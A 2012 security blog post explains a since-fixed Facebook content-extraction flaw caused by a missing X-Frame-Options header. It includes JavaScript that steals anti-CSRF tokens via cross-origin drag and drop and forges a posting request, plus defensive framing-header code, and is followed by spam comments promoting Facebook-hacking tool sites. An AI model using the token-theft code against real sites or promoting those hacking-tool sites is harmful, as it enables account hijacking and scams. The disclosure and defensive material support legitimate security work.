Friday, August 17, 2012

How Facebook lacked X-Frame-Options and what I did with it

In September 2011 I discovered a vulnerability that allowed an attacker to partially take control of a victim's Facebook account. Among other things, it allowed the attacker to post status updates on behalf of the user and to send friend requests to an attacker-controlled Facebook account. The vulnerability was responsibly disclosed through the Facebook Security Bug Bounty program and is now fixed.

Details

http[s]://www.facebook.com/plugins/serverfbml.php relied on JavaScript alone for frame-busting and did not send the X-Frame-Options header. That made it possible to build a UI redressing content extraction attack: trick the user into dragging the HTML source of that page into the attacker's page. The attack relied on two Firefox behaviours: the ability to display view-source: URLs inside iframes, and the ability to perform drag & drop across origins (so only Firefox users were affected). Loading the page through view-source: also sidesteps the script-based frame-busting, because the source viewer renders the markup as text and executes none of it; only a response header such as X-Frame-Options, which the browser enforces regardless of whether any script runs, would have stopped the framing.

The page rendered FBML passed in a GET parameter; <form><fb:captcha></form> was used as the example FBML payload. The server response contained a JavaScript Env object with multiple sensitive user values:
{
  user:100001652298988,
  locale:"en_US",
  method:"GET",
  start:(new Date()).getTime(),
  ps_limit:5,
  ps_ratio:4,
  svn_rev:441515,
  static_base:"https:\/\/s-static.ak.facebook.com\/",
  www_base:"http:\/\/www.facebook.com\/",
  rep_lag:2,
  post_form_id:"eecde0da0dc4bc800d385dde5dd37608",
  fb_dtsg:"AQAUh3Jx",
  lhsh:"0AQAQVvsl",
  error_uri:".....",
  retry_ajax_on_network_error:"1",
  ajaxpipe_enabled:"1",
  theater_ver:"2"
};
Apart from the user ID (a privacy issue in itself), the source contains two interesting values: fb_dtsg and post_form_id. These are Facebook's anti-CSRF tokens; knowing them, an attacker could e.g. post status updates on behalf of the logged-in user. In Firefox it was possible to trick the user into selecting and dragging these values into an attacker-controlled page.

So if a user authenticated to Facebook navigated to the attacker's URL (e.g. via a link shared by a friend) and "played a game", the attacker obtained the HTML source of the vulnerable Facebook page, and with it the user ID and the CSRF tokens. Having those, the attacker could issue any number of forged requests: the victim's browser attached the Facebook session cookies automatically, and the stolen tokens satisfied the anti-CSRF check.
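To make the data-handling half of that chain concrete, here is an added illustration in JavaScript. It is my reconstruction for this write-up, not the demo code from the post: the drop handler on the attacker's page reads the dragged view-source: text, parses the Env object for the user ID and the two anti-CSRF tokens, and auto-submits a cross-origin form that carries them along with the victim's cookies. The sample dropped text is constructed with made-up values; the 'drop-target' element id, the endpoint in ATTACK_ACTION and the 'status' parameter name are placeholders, not values taken from Facebook.

```javascript
// Added illustration (not the author's demo code) of the data-handling half
// of the attack: the victim drags the selected text of the framed
// view-source: page onto the attacker's page, the drop handler reads it as
// plain text, the attacker parses the Env object for the user ID and the
// anti-CSRF tokens, then forges a POST that rides on the victim's session
// cookies. Element id, endpoint and the extra parameter name are placeholders.

// Constructed sample of dropped text, shaped like the Env object in the
// post but with made-up values.
const SAMPLE_DROP = `
  user:123456789,
  locale:"en_US",
  post_form_id:"0123456789abcdef0123456789abcdef",
  fb_dtsg:"AAAAexample",
  lhsh:"0ZZZZexample",
`;

// The three fields worth stealing, matched by the name:value shape the page
// used. The regexes deliberately do not assume a particular token length.
const FIELD_PATTERNS = {
  user: /\buser\s*:\s*(\d+)/,
  fb_dtsg: /\bfb_dtsg\s*:\s*"([^"]*)"/,
  post_form_id: /\bpost_form_id\s*:\s*"([0-9a-f]+)"/i,
};

// Parse the dropped text. Returns null unless every field is present, so a
// partial drag (the victim released early) never yields a half-usable set.
function extractTokens(droppedText) {
  const tokens = {};
  for (const [name, re] of Object.entries(FIELD_PATTERNS)) {
    const m = re.exec(droppedText);
    if (!m) return null;
    tokens[name] = m[1];
  }
  return tokens;
}

// Fields for the forged request: the two stolen tokens plus whatever the
// target endpoint expects. The browser adds the session cookies itself; the
// tokens are what turn a plain CSRF attempt into an accepted request.
function forgedFields(tokens, extra) {
  return { fb_dtsg: tokens.fb_dtsg, post_form_id: tokens.post_form_id, ...extra };
}

// Classic CSRF delivery: a hidden, auto-submitted cross-origin form.
function submitForged(doc, action, fields) {
  const form = doc.createElement('form');
  form.method = 'POST';
  form.action = action;
  for (const [name, value] of Object.entries(fields)) {
    const input = doc.createElement('input');
    input.type = 'hidden';
    input.name = name;
    input.value = value;
    form.appendChild(input);
  }
  doc.body.appendChild(form);
  form.submit();
  return form;
}

// Browser-only wiring; guarded so the parsing helpers also run under Node.
// 'drop-target' and ATTACK_ACTION are hypothetical.
const ATTACK_ACTION = '/hypothetical/state-changing/endpoint';
if (typeof document !== 'undefined') {
  const target = document.getElementById('drop-target');
  target.addEventListener('dragover', (e) => e.preventDefault());
  target.addEventListener('drop', (e) => {
    e.preventDefault();
    const tokens = extractTokens(e.dataTransfer.getData('text/plain'));
    if (!tokens) return;
    // 'status' is an assumed parameter name for the status-update example.
    submitForged(document, ATTACK_ACTION,
      forgedFields(tokens, { status: 'posted via stolen tokens' }));
  });
}
```

The parsing step is the fragile part in practice: the victim has to drag a selection that includes both tokens, which is why the demo's double drag & drop trick matters, and why extractTokens refuses to return anything unless all three fields were captured.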

Demo

In the demo I use a modified version of the double drag & drop UI redressing technique developed by Nafeez Ahamed (@skeptic_fx). As an exploitation example, a status update is posted for the victim user and a friend request is sent to another user (e.g. the attacker). More is probably possible with these tokens, such as sharing or liking a given URL, but I haven't researched that.

Some fixes are quick, others...

The proposed fix was to send X-Frame-Options on the page in question. The Facebook side was fixed, tested and deployed before Oct 14, 2011. The relevant Firefox bug #605991 (Drag-and-drop may be used to steal content across domains), however, waited two years, and its fix has only just shipped in Firefox 14. As of Firefox 14 you can no longer drag & drop content cross-domain. So update your Firefox and stay safe!
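As an added example (not code from the post or from Facebook), here is the server-side fix the post recommends next to a header check you can run against any page you suspect relies on script frame-busting alone. The X-Frame-Options values are the defined ones (DENY, SAMEORIGIN, ALLOW-FROM). The Content-Security-Policy frame-ancestors directive did not exist in 2011 and is included as an assumption about what you would deploy today; the server, port and page body are placeholders.

```javascript
// Added example, not code from the post or from Facebook: the fix the post
// recommends (send X-Frame-Options) beside a check that classifies a
// response's framing protection. frame-ancestors is the modern complement.

// Apply framing protection to a response-like object (anything with
// setHeader, e.g. Node's http.ServerResponse). Both headers are sent:
// browsers that understand frame-ancestors enforce it and ignore XFO,
// older ones fall back to XFO.
function setFramingHeaders(res, policy = 'DENY') {
  const frameAncestors = policy === 'SAMEORIGIN' ? "'self'" : "'none'";
  res.setHeader('X-Frame-Options', policy);
  res.setHeader('Content-Security-Policy', `frame-ancestors ${frameAncestors}`);
  return res;
}

// Classify a response's framing protection. `headers` is a lower-cased
// name -> value map, the shape Node's http.IncomingMessage#headers uses.
function assessFrameProtection(headers) {
  const csp = headers['content-security-policy'] || '';
  const fa = /(?:^|;)\s*frame-ancestors\s+([^;]+)/i.exec(csp);
  if (fa) {
    return { protected: true, by: 'frame-ancestors', value: fa[1].trim() };
  }
  const xfo = (headers['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY' || xfo === 'SAMEORIGIN') {
    return { protected: true, by: 'x-frame-options', value: xfo };
  }
  if (xfo.startsWith('ALLOW-FROM')) {
    // Never supported by Chrome or Safari and since removed from Firefox;
    // a browser that does not know the value treats the header as absent.
    return { protected: false, by: 'x-frame-options', value: xfo,
             note: 'ALLOW-FROM is not honoured by most browsers' };
  }
  if (xfo) {
    return { protected: false, by: 'x-frame-options', value: xfo,
             note: 'unrecognised value' };
  }
  // No declarative protection at all: the state serverfbml.php was in.
  // Script frame-busting does not count; a view-source: framing runs no script.
  return { protected: false, by: null, value: null, note: 'no framing header' };
}

// Minimal server applying the fix to every response. It is not started
// automatically: run `node thisfile.js --serve` (placeholder name) and
// inspect with `curl -I http://127.0.0.1:8080/`.
function createHardenedServer(body) {
  const http = require('http');
  return http.createServer((req, res) => {
    setFramingHeaders(res, 'DENY');
    res.setHeader('Content-Type', 'text/html; charset=utf-8');
    res.end(body);
  });
}

if (typeof process !== 'undefined' && process.argv.includes('--serve')) {
  createHardenedServer('<p>framing-protected</p>').listen(8080, '127.0.0.1');
}
```

Run assessFrameProtection over the headers of a HEAD request to each page that embeds session-bound tokens in its markup; any result with protected false is a candidate for the same content-extraction attack, whatever JavaScript the page runs.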


11 comments:

homakov said...

I have wanted cross framing to be denied since I was a 4-year-old boy :)
http://homakov.blogspot.com/2012/06/saferweb-with-new-features-come-new.html

Actually you can check the Alexa top 100 and continue hacking this way. The same goes for CSRF.

Liza Karen said...

Change banners by tab ads. Buttons have less space and are generally faster to load. Make sure your buttons are generally attractive and show clearly what they redirect to. Do not have all your buttons in a single region: place them in different parts of your website. Use banner ad campaigns for your most important products only. Buy Facebook Likes, Buy Facebook Fans, FB Likes

gardendecors lebanon said...

Excellent post! This is awesome. This is basically ideal and has added great understanding to my knowing.
http://www.gardendecors.net

mike said...

I couldn’t refrain from commenting. Perfectly written! Ever wanted to hack your friends or foes facebook account? Worry not, we have the simplest and easiest tool to hack any facebook profile or account for free. Just visit www.hackfbaccount.net and start hacking.

Hack Facebook said...

Can I simply say what a comfort to uncover someone that really understands what they are discussing over the internet. You actually understand how to bring an issue to light and make it important. More people need to look at this and understand this side of the story. It's surprising you are not more popular given that you surely have the gift. Visit www.hackfbaccount.net to download facebook profile hacker and facebook hacker. Online facebook hacker and its all free now download www.hackfbaccount.net.

Brian Depp said...

What is this used for? Can I hack a FB account with that, or...?
Can someone please tell me if it tried a site www.hack-facebook-password.org? I noticed this site on some fan page but still can't how to download this. Can you help me please, or send it to my inbox on FB. Thanks a lot.

Hack Facebook said...

I was more than happy to discover this web site. I want to to thank you for ones time for this particularly wonderful read!! I definitely savored every bit of it and I have you bookmarked to see new stuff on your blog. Visit www.hackfbpassword.org to download facebook profile hacker and facebook hacker. Online facebook hacker and its all free now download www.hackfbpassword.org.

I was more than happy to discover this web site. I want to to thank you for ones time for this particularly wonderful read!! I definitely savored every bit of it and I have you bookmarked to see new stuff on your blog. Visit www.hackfbaccount.org to download facebook profile hacker and facebook hacker. Online facebook hacker and its all free now download www.hackfbaccount.org.!

Hack Facebook said...

Hi there! I could have sworn I’ve visited this site before but after going through many of the posts I realized it’s new to me. Regardless, I’m certainly pleased I came across it and I’ll be bookmarking it and checking back frequently! Learn how to hack a facebook account. Visit www.hackfbaccount.org for the latest facebook hacking tips, information and tools. :

Hack Facebook said...

May I simply say what a relief to uncover someone who really understands what they're talking about online. You definitely know how to bring an issue to light and make it important. More and more people really need to check this out and understand this side of your story. It's surprising you aren't more popular because you definitely have the gift. Download facebook account hacker at www.hackfbaccounts.org.

Malik Gupta said...

Thanks for the article, you can also Hack Facebook using his method

Joana Kane said...

Facebook is much more improved now.
http://www.fbpiraterfr.com/
http://gadgetspeaks.com/
http://aadhaarcarduid.org/
http://cheatjunction.com/hay-day-diamond-hack-cheats/